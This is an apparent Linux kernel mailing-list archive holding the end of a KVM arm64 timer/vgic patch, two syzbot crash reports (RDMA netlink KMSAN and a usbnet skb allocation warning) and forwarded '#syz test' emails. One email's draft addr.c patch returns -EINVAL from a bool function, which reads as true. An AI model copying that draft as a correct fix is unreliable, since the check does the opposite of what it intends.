 void kvm_timer_vcpu_put(struct kvm_vcpu *vcpu)
@@ -983,7 +983,7 @@ static void unmask_vtimer_irq_user(struct kvm_vcpu *vcpu)
 {
 	struct arch_timer_context *vtimer = vcpu_vtimer(vcpu);
 
-	if (!kvm_timer_should_fire(vtimer)) {
+	if (!kvm_timer_pending(vtimer)) {
 		kvm_timer_update_irq(vcpu, false, vtimer);
 		if (static_branch_likely(&has_gic_active_state))
 			set_timer_irq_phys_active(vtimer, false);
@@ -1530,7 +1530,7 @@ static bool kvm_arch_timer_get_input_level(int vintid)
 
 		ctx = vcpu_get_timer(vcpu, i);
 		if (timer_irq(ctx) == vintid)
-			return kvm_timer_should_fire(ctx);
+			return kvm_timer_pending(ctx);
 	}
 
 	/* A timer IRQ has fired, but no matching timer was found? */
diff --git a/arch/arm64/kvm/arm.c b/arch/arm64/kvm/arm.c
index 410ffd41fd73a..2faa6d1dd01fa 100644
--- a/arch/arm64/kvm/arm.c
+++ b/arch/arm64/kvm/arm.c
@@ -46,6 +46,7 @@
 #include <kvm/arm_pmu.h>
 #include <kvm/arm_psci.h>
 
+#include "vgic/vgic.h"
 #include "sys_regs.h"
 
 static enum kvm_mode kvm_mode = KVM_MODE_DEFAULT;
@@ -1451,6 +1452,12 @@ int kvm_vm_ioctl_irq_line(struct kvm *kvm, struct kvm_irq_level *irq_level,
 
 	trace_kvm_irq_line(irq_type, vcpu_id, irq_num, irq_level->level);
 
+	if (irqchip_in_kernel(kvm)) {
+		int ret = vgic_lazy_init(kvm);
+		if (ret)
+			return ret;
+	}
+
 	switch (irq_type) {
 	case KVM_ARM_IRQ_TYPE_CPU:
 		if (irqchip_in_kernel(kvm))
diff --git a/arch/arm64/kvm/vgic/vgic.c b/arch/arm64/kvm/vgic/vgic.c
index e22b79cfff965..9acf44124ac89 100644
--- a/arch/arm64/kvm/vgic/vgic.c
+++ b/arch/arm64/kvm/vgic/vgic.c
@@ -515,11 +515,9 @@ int kvm_vgic_inject_irq(struct kvm *kvm, struct kvm_vcpu *vcpu,
 {
 	struct vgic_irq *irq;
 	unsigned long flags;
-	int ret;
 
-	ret = vgic_lazy_init(kvm);
-	if (ret)
-		return ret;
+	if (unlikely(!vgic_initialized(kvm)))
+		return 0;
 
 	if (!vcpu && intid < VGIC_NR_PRIVATE_IRQS)
 		return -EINVAL;
diff --git a/include/kvm/arm_arch_timer.h b/include/kvm/arm_arch_timer.h
index 7310841f45121..49c083c649425 100644
--- a/include/kvm/arm_arch_timer.h
+++ b/include/kvm/arm_arch_timer.h
@@ -64,11 +64,6 @@ struct arch_timer_context {
 	 */
 	bool				loaded;
 
-	/* Output level of the timer IRQ */
-	struct {
-		bool			level;
-	} irq;
-
 	/* Who am I? */
 	enum kvm_arch_timers		timer_id;
 
-- 
2.47.3

-- 
Without deviation from the norm, progress is not possible.

[syzbot] [rdma?] KMSAN: uninit-value in ib_nl_handle_ip_res_resp

[syzbot]

Hello,

syzbot found the following issue on:

HEAD commit:    1896ce8eb6c6 Merge tag 'fsverity-for-linus' of git://git.k..
git tree:       upstream
console output: https://syzkaller.appspot.com/x/log.txt?x=153d0092580000
kernel config:  https://syzkaller.appspot.com/x/.config?x=6eca10e0cdef44f
dashboard link: https://syzkaller.appspot.com/bug?extid=938fcd548c303fe33c1a
compiler:       Debian clang version 20.1.8 (++20250708063551+0c9f909b7976-1~exp1~20250708183702.136), Debian LLD 20.1.8
userspace arch: i386

Unfortunately, I don't have any reproducer for this issue yet.

Downloadable assets:
disk image: https://storage.googleapis.com/syzbot-assets/d0fbab3c0b62/disk-1896ce8e.raw.xz
vmlinux: https://storage.googleapis.com/syzbot-assets/71c7b444e106/vmlinux-1896ce8e.xz
kernel image: https://storage.googleapis.com/syzbot-assets/96a4aa63999d/bzImage-1896ce8e.xz

IMPORTANT: if you fix the issue, please add the following tag to the commit:
Reported-by: syzbot+938fcd548c303fe33c1a@syzkaller.appspotmail.com

netlink: 8 bytes leftover after parsing attributes in process `syz.8.3246'.
=====================================================
BUG: KMSAN: uninit-value in hex_byte_pack include/linux/hex.h:13 [inline]
BUG: KMSAN: uninit-value in ip6_string+0xef4/0x13a0 lib/vsprintf.c:1490
 hex_byte_pack include/linux/hex.h:13 [inline]
 ip6_string+0xef4/0x13a0 lib/vsprintf.c:1490
 ip6_addr_string+0x18a/0x3e0 lib/vsprintf.c:1509
 ip_addr_string+0x245/0xee0 lib/vsprintf.c:1633
 pointer+0xc09/0x1bd0 lib/vsprintf.c:2542
 vsnprintf+0xf8a/0x1bd0 lib/vsprintf.c:2930
 vprintk_store+0x3ae/0x1530 kernel/printk/printk.c:2279
 vprintk_emit+0x307/0xcd0 kernel/printk/printk.c:2426
 vprintk_default+0x3f/0x50 kernel/printk/printk.c:2465
 vprintk+0x36/0x50 kernel/printk/printk_safe.c:82
 _printk+0x17e/0x1b0 kernel/printk/printk.c:2475
 ib_nl_process_good_ip_rsep drivers/infiniband/core/addr.c:128 [inline]
 ib_nl_handle_ip_res_resp+0x963/0x9d0 drivers/infiniband/core/addr.c:141
 rdma_nl_rcv_msg drivers/infiniband/core/netlink.c:-1 [inline]
 rdma_nl_rcv_skb drivers/infiniband/core/netlink.c:239 [inline]
 rdma_nl_rcv+0xefa/0x11c0 drivers/infiniband/core/netlink.c:259
 netlink_unicast_kernel net/netlink/af_netlink.c:1320 [inline]
 netlink_unicast+0xf04/0x12b0 net/netlink/af_netlink.c:1346
 netlink_sendmsg+0x10b3/0x1250 net/netlink/af_netlink.c:1896
 sock_sendmsg_nosec net/socket.c:714 [inline]
 __sock_sendmsg+0x333/0x3d0 net/socket.c:729
 ____sys_sendmsg+0x7e0/0xd80 net/socket.c:2617
 ___sys_sendmsg+0x271/0x3b0 net/socket.c:2671
 __sys_sendmsg+0x1aa/0x300 net/socket.c:2703
 __compat_sys_sendmsg net/compat.c:346 [inline]
 __do_compat_sys_sendmsg net/compat.c:353 [inline]
 __se_compat_sys_sendmsg net/compat.c:350 [inline]
 __ia32_compat_sys_sendmsg+0xa4/0x100 net/compat.c:350
 ia32_sys_call+0x3f6c/0x4310 arch/x86/include/generated/asm/syscalls_32.h:371
 do_syscall_32_irqs_on arch/x86/entry/syscall_32.c:83 [inline]
 __do_fast_syscall_32+0xb0/0x150 arch/x86/entry/syscall_32.c:306
 do_fast_syscall_32+0x38/0x80 arch/x86/entry/syscall_32.c:331
 do_SYSENTER_32+0x1f/0x30 arch/x86/entry/syscall_32.c:369
 entry_SYSENTER_compat_after_hwframe+0x84/0x8e

Local variable gid.i created at:
 ib_nl_process_good_ip_rsep drivers/infiniband/core/addr.c:102 [inline]
 ib_nl_handle_ip_res_resp+0x254/0x9d0 drivers/infiniband/core/addr.c:141
 rdma_nl_rcv_msg drivers/infiniband/core/netlink.c:-1 [inline]
 rdma_nl_rcv_skb drivers/infiniband/core/netlink.c:239 [inline]
 rdma_nl_rcv+0xefa/0x11c0 drivers/infiniband/core/netlink.c:259

CPU: 0 UID: 0 PID: 17455 Comm: syz.8.3246 Not tainted syzkaller #0 PREEMPT(none) 
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 08/18/2025
=====================================================


---
This report is generated by a bot. It may contain errors.
See https://goo.gl/tpsmEJ for more information about syzbot.
syzbot engineers can be reached at syzkaller@googlegroups.com.

syzbot will keep track of this issue. See:
https://goo.gl/tpsmEJ#status for how to communicate with syzbot.

If the report is already addressed, let syzbot know by replying with:
#syz fix: exact-commit-title

If you want to overwrite report's subsystems, reply with:
#syz set subsystems: new-subsystem
(See the list of subsystem names on the web dashboard)

If the report is a duplicate of another one, reply with:
#syz dup: exact-subject-of-another-report

If you want to undo deduplication, reply with:
#syz undup

Forwarded: syz test

[syzbot]

For archival purposes, forwarding an incoming command email to
linux-kernel@vger.kernel.org, syzkaller-bugs@googlegroups.com.

***

Subject: syz test
Author: kriish.sharma2006@gmail.com

#syz test

Forwarded: syz test

[syzbot]

For archival purposes, forwarding an incoming command email to
linux-kernel@vger.kernel.org, syzkaller-bugs@googlegroups.com.

***

Subject: syz test
Author: kriish.sharma2006@gmail.com

#syz test


 drivers/infiniband/core/addr.c | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/drivers/infiniband/core/addr.c b/drivers/infiniband/core/addr.c
index 61596cda2b65..f33d8040bbd5 100644
--- a/drivers/infiniband/core/addr.c
+++ b/drivers/infiniband/core/addr.c
@@ -93,13 +93,16 @@ static inline bool ib_nl_is_good_ip_resp(const
struct nlmsghdr *nlh)
  if (ret)
  return false;

+ if (!tb[LS_NLA_TYPE_DGID])
+ return -EINVAL;;
+
  return true;
 }

 static void ib_nl_process_good_ip_rsep(const struct nlmsghdr *nlh)
 {
  const struct nlattr *head, *curr;
- union ib_gid gid;
+ union ib_gid gid = {};
  struct addr_req *req;
  int len, rem;
  int found = 0;

Forwarded: syz test

[syzbot]

For archival purposes, forwarding an incoming command email to
linux-kernel@vger.kernel.org, syzkaller-bugs@googlegroups.com.

***

Subject: syz test
Author: kriish.sharma2006@gmail.com

#syz test

[syzbot] [mm?] [usb?] WARNING in __alloc_skb (4)

[syzbot]

Hello,

syzbot found the following issue on:

HEAD commit:    7fa4d8dc380f Add linux-next specific files for 20250821
git tree:       linux-next
console output: https://syzkaller.appspot.com/x/log.txt?x=11fecc42580000
kernel config:  https://syzkaller.appspot.com/x/.config?x=ae76068823a236b3
dashboard link: https://syzkaller.appspot.com/bug?extid=5a2250fd91b28106c37b
compiler:       Debian clang version 20.1.7 (++20250616065708+6146a88f6049-1~exp1~20250616065826.132), Debian LLD 20.1.7
syz repro:      https://syzkaller.appspot.com/x/repro.syz?x=14c94858580000
C reproducer:   https://syzkaller.appspot.com/x/repro.c?x=108ea7bc580000

Downloadable assets:
disk image: https://storage.googleapis.com/syzbot-assets/63178c6ef3f8/disk-7fa4d8dc.raw.xz
vmlinux: https://storage.googleapis.com/syzbot-assets/c5c27b0841e0/vmlinux-7fa4d8dc.xz
kernel image: https://storage.googleapis.com/syzbot-assets/9a8832715cca/bzImage-7fa4d8dc.xz

IMPORTANT: if you fix the issue, please add the following tag to the commit:
Reported-by: syzbot+5a2250fd91b28106c37b@syzkaller.appspotmail.com

------------[ cut here ]------------
WARNING: mm/page_alloc.c:5124 at __alloc_frozen_pages_noprof+0x2c8/0x370 mm/page_alloc.c:5124, CPU#0: dhcpcd/5530
Modules linked in:
CPU: 0 UID: 0 PID: 5530 Comm: dhcpcd Not tainted syzkaller #0 PREEMPT(full) 
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 07/12/2025
RIP: 0010:__alloc_frozen_pages_noprof+0x2c8/0x370 mm/page_alloc.c:5124
Code: 74 10 4c 89 e7 89 54 24 0c e8 f4 11 0d 00 8b 54 24 0c 49 83 3c 24 00 0f 85 a5 fe ff ff e9 a6 fe ff ff c6 05 fe aa b7 0d 01 90 <0f> 0b 90 e9 18 ff ff ff a9 00 00 08 00 48 8b 4c 24 10 4c 8d 44 24
RSP: 0018:ffffc90000007780 EFLAGS: 00010246
RAX: ffffc90000007700 RBX: 0000000000000014 RCX: 0000000000000000
RDX: 0000000000000000 RSI: 0000000000000000 RDI: ffffc900000077e8
RBP: ffffc90000007870 R08: ffffc900000077e7 R09: 0000000000000000
R10: ffffc900000077c0 R11: fffff52000000efd R12: 0000000000000000
R13: 1ffff92000000ef4 R14: 0000000000060820 R15: dffffc0000000000
FS:  00007f4fd75a9740(0000) GS:ffff8881257c4000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 00007ffebb07e018 CR3: 000000001dadc000 CR4: 00000000003526f0
Call Trace:
 <IRQ>
 alloc_pages_mpol+0x232/0x4a0 mm/mempolicy.c:2416
 ___kmalloc_large_node+0x5f/0x1b0 mm/slub.c:4306
 __kmalloc_large_node_noprof+0x18/0x90 mm/slub.c:4337
 __do_kmalloc_node mm/slub.c:4353 [inline]
 __kmalloc_node_track_caller_noprof+0x34d/0x4a0 mm/slub.c:4384
 kmalloc_reserve+0x1b8/0x290 net/core/skbuff.c:608
 __alloc_skb+0x142/0x2d0 net/core/skbuff.c:669
 __netdev_alloc_skb+0x108/0x970 net/core/skbuff.c:733
 rx_submit+0x100/0xab0 drivers/net/usb/usbnet.c:-1
 rx_alloc_submit+0xa6/0x140 drivers/net/usb/usbnet.c:1538
 usbnet_bh+0x9a5/0xd70 drivers/net/usb/usbnet.c:1607
 process_one_work kernel/workqueue.c:3236 [inline]
 process_scheduled_works+0xae1/0x17b0 kernel/workqueue.c:3319
 bh_worker+0x2b1/0x600 kernel/workqueue.c:3579
 tasklet_action+0xc/0x70 kernel/softirq.c:854
 handle_softirqs+0x283/0x870 kernel/softirq.c:579
 do_softirq+0xec/0x180 kernel/softirq.c:480
 </IRQ>
 <TASK>
 __local_bh_enable_ip+0x17d/0x1c0 kernel/softirq.c:407
 __dev_open+0x694/0x880 net/core/dev.c:1690
 __dev_change_flags+0x1ea/0x6d0 net/core/dev.c:9549
 netif_change_flags+0x88/0x1a0 net/core/dev.c:9612
 dev_change_flags+0x130/0x260 net/core/dev_api.c:68
 devinet_ioctl+0xbb4/0x1b50 net/ipv4/devinet.c:1200
 inet_ioctl+0x3c0/0x4c0 net/ipv4/af_inet.c:1001
 sock_do_ioctl+0xd9/0x300 net/socket.c:1238
 sock_ioctl+0x576/0x790 net/socket.c:1359
 vfs_ioctl fs/ioctl.c:51 [inline]
 __do_sys_ioctl fs/ioctl.c:598 [inline]
 __se_sys_ioctl+0xf9/0x170 fs/ioctl.c:584
 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
 do_syscall_64+0xfa/0xfa0 arch/x86/entry/syscall_64.c:94
 entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7f4fd76a9378
Code: 00 00 48 8d 44 24 08 48 89 54 24 e0 48 89 44 24 c0 48 8d 44 24 d0 48 89 44 24 c8 b8 10 00 00 00 c7 44 24 b8 10 00 00 00 0f 05 <89> c2 3d 00 f0 ff ff 77 07 89 d0 c3 0f 1f 40 00 48 8b 15 49 3a 0d
RSP: 002b:00007ffc26f40168 EFLAGS: 00000246 ORIG_RAX: 0000000000000010
RAX: ffffffffffffffda RBX: 0000000000000016 RCX: 00007f4fd76a9378
RDX: 00007ffc26f50360 RSI: 0000000000008914 RDI: 0000000000000016
RBP: 0000000000000000 R08: 0000000000000000 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000246 R12: 00007ffc26f60500
R13: 00007f4fd75a96c8 R14: 0000000000000028 R15: 0000000000008914
 </TASK>


---
This report is generated by a bot. It may contain errors.
See https://goo.gl/tpsmEJ for more information about syzbot.
syzbot engineers can be reached at syzkaller@googlegroups.com.

syzbot will keep track of this issue. See:
https://goo.gl/tpsmEJ#status for how to communicate with syzbot.

If the report is already addressed, let syzbot know by replying with:
#syz fix: exact-commit-title

If you want syzbot to run the reproducer, reply with:
#syz test: git://repo/address.git branch-or-commit-hash
If you attach or paste a git patch, syzbot will apply it before testing.

If you want to overwrite report's subsystems, reply with:
#syz set subsystems: new-subsystem
(See the list of subsystem names on the web dashboard)

If the report is a duplicate of another one, reply with:
#syz dup: exact-subject-of-another-report

If you want to undo deduplication, reply with:
#syz undup

Forwarded: syz test

[syzbot]

For archival purposes, forwarding an incoming command email to
linux-kernel@vger.kernel.org.

***

Subject: syz test
Author: kriish.sharma2006@gmail.com

#syz test